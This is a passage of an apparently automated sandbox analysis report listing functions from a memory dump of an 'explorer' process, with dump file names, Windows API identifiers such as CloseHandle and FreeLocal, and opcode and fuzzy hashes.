                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocal
                                                                            • String ID:
                                                                            • API String ID: 2513001865-0
                                                                            • Opcode ID: 01f9c0b65a60e50d8fa6dda341f56b99c4a3bf48c253a9652d73433e2a8fe8a7
                                                                            • Instruction ID: 3bbb69d34e733559cd660b6f44448c72b269daf94a03af583641f45dc1d0e095
                                                                            • Opcode Fuzzy Hash: 01f9c0b65a60e50d8fa6dda341f56b99c4a3bf48c253a9652d73433e2a8fe8a7
                                                                            • Instruction Fuzzy Hash: 6301A420104A6492FB219B14F8B8BBA33A1F385B65F640365D64A826B0CFBC88CED305
                                                                            Function 00BFD05E Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocal
                                                                            • String ID:
                                                                            • API String ID: 2513001865-0
                                                                            • Opcode ID: 82d95b7103033d902948a90c9e8e53d16c8e26a2043a74430fc3d0cce4b7eb71
                                                                            • Instruction ID: 3bbb69d34e733559cd660b6f44448c72b269daf94a03af583641f45dc1d0e095
                                                                            • Opcode Fuzzy Hash: 82d95b7103033d902948a90c9e8e53d16c8e26a2043a74430fc3d0cce4b7eb71
                                                                            • Instruction Fuzzy Hash: 6301A420104A6492FB219B14F8B8BBA33A1F385B65F640365D64A826B0CFBC88CED305
                                                                            Function 00BE58D9 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: 407ad451bf2e2bf966aa73b9f4abba4dafead0985304cf0f56f4df019bbe3795
                                                                            • Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
                                                                            • Opcode Fuzzy Hash: 407ad451bf2e2bf966aa73b9f4abba4dafead0985304cf0f56f4df019bbe3795
                                                                            • Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
                                                                            Function 00BE5840 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: 7a11eaf5b6decfaec6b1ebbcad1cf123de54f51fc7bafbc7f171939df23a1507
                                                                            • Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
                                                                            • Opcode Fuzzy Hash: 7a11eaf5b6decfaec6b1ebbcad1cf123de54f51fc7bafbc7f171939df23a1507
                                                                            • Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
                                                                            Function 00BE59A3 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: 97c120b3682c5ed04db4746d2c43bdfd2237f865d6f77661787bc7a0d9153a52
                                                                            • Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
                                                                            • Opcode Fuzzy Hash: 97c120b3682c5ed04db4746d2c43bdfd2237f865d6f77661787bc7a0d9153a52
                                                                            • Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
                                                                            Function 00BE5938 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: 3edb39da4be888a4e78e7200a33b6930fa08532986cacb0a95628ca783af63a6
                                                                            • Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
                                                                            • Opcode Fuzzy Hash: 3edb39da4be888a4e78e7200a33b6930fa08532986cacb0a95628ca783af63a6
                                                                            • Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
                                                                            Function 00BE5976 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: 03c3a733a97b371f1f42efaee49954e42a73cd089242ffe169e8e5e154ab26d8
                                                                            • Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
                                                                            • Opcode Fuzzy Hash: 03c3a733a97b371f1f42efaee49954e42a73cd089242ffe169e8e5e154ab26d8
                                                                            • Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
                                                                            Function 00BE5959 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: 5946f75d4281cf458fac700386fabe8289b454c7aac5af985b5156ca8fb65c3d
                                                                            • Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
                                                                            • Opcode Fuzzy Hash: 5946f75d4281cf458fac700386fabe8289b454c7aac5af985b5156ca8fb65c3d
                                                                            • Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
                                                                            Function 00BE53E3 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: 8483f27cf3c202a42093d3c09f44cd1b5990f8809433e4656333d8c12ef8bf92
                                                                            • Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
                                                                            • Opcode Fuzzy Hash: 8483f27cf3c202a42093d3c09f44cd1b5990f8809433e4656333d8c12ef8bf92
                                                                            • Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
                                                                            Function 00BFB18B Relevance: 5.0, APIs: 4, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            • Opcode ID: 3cae6b998a735656f007d17f4acdc30651bed47cb146deaa7af56f0f97f08863
                                                                            • Instruction ID: f7fc5cd8ee5942133479a987eb03f4c1f6325eb04175a3696034c1abd98fe799
                                                                            • Opcode Fuzzy Hash: 3cae6b998a735656f007d17f4acdc30651bed47cb146deaa7af56f0f97f08863
                                                                            • Instruction Fuzzy Hash: CAF00735624AC4C2FB21AB65F87476D6371F7C8B91F504212DA4E43768CE38D54DD700